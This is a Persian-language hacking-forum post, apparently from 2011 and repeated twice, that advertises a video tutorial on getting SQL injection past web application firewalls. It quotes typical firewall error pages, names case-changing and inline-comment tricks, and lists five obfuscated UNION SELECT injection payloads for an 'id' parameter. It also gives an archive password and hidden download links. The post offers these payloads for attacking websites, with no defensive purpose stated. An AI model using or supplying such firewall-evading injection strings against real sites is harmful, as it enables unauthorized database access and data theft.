manixXxier
09-06-2011, 11:04 AM
با سلام و عرض خسته نباشید:
در بسیاری از حملان تزریق به دیتابیس فایروال های تحت وب با عث عدم تزریق دستورات میشند که معمولا چنین ارور هایی رو برای ما به نمایش در میارن:
Forbidden
You don't have permission to access /[].php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Not Acceptable
An appropriate representation of the requested resource /[].php could not be found on this server.
correspond
You don't have permission to access /[].php on this server.
که برای بایپس کردن این گونه ارور ها می تونید از روش های مختلفی نظیر inline comment یا case changing و... استفاده کنید , البته در بعضی موارد اگر خود فایروال به آسیب پذیری corresponding الوده باشه می تونید دستورات رو با دست باز تری مثله :
1:id=1/*union*/union/*select*/select+1,2,3/*
2:id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
3:id=1+un/**/ion+sel/**/ect+1,2,3--
4:id=1/**/union/*&id=*/select/
5:id=1/**/union/*,*/select/*,*/
.
.
.
وارد کنید ( که البته در آینده از این نوع رو هم فیلم می کنم)
و بالاخره موضوع فیلم:
1: Case changing
2:Inline Comments
================================================== ===
اولین فیلمی هست که میسازم به بزرگیتون ببخشید و لطفا فقط فیلم رو با ابزار camplay که داخل فایل هست ببینید تا کیفیت خوبی داشته باشه.
پسورد: ashiyane.org
فایل رو نتونستم پیوست کنم از [Only registered and activated users can see links] استفاده کنید.
================================================== ===
[Only registered and activated users can see links]
در بسیاری از حملان تزریق به دیتابیس فایروال های تحت وب با عث عدم تزریق دستورات میشند که معمولا چنین ارور هایی رو برای ما به نمایش در میارن:
Forbidden
You don't have permission to access /[].php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Not Acceptable
An appropriate representation of the requested resource /[].php could not be found on this server.
correspond
You don't have permission to access /[].php on this server.
که برای بایپس کردن این گونه ارور ها می تونید از روش های مختلفی نظیر inline comment یا case changing و... استفاده کنید , البته در بعضی موارد اگر خود فایروال به آسیب پذیری corresponding الوده باشه می تونید دستورات رو با دست باز تری مثله :
1:id=1/*union*/union/*select*/select+1,2,3/*
2:id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
3:id=1+un/**/ion+sel/**/ect+1,2,3--
4:id=1/**/union/*&id=*/select/
5:id=1/**/union/*,*/select/*,*/
.
.
.
وارد کنید ( که البته در آینده از این نوع رو هم فیلم می کنم)
و بالاخره موضوع فیلم:
1: Case changing
2:Inline Comments
================================================== ===
اولین فیلمی هست که میسازم به بزرگیتون ببخشید و لطفا فقط فیلم رو با ابزار camplay که داخل فایل هست ببینید تا کیفیت خوبی داشته باشه.
پسورد: ashiyane.org
فایل رو نتونستم پیوست کنم از [Only registered and activated users can see links] استفاده کنید.
================================================== ===
[Only registered and activated users can see links]
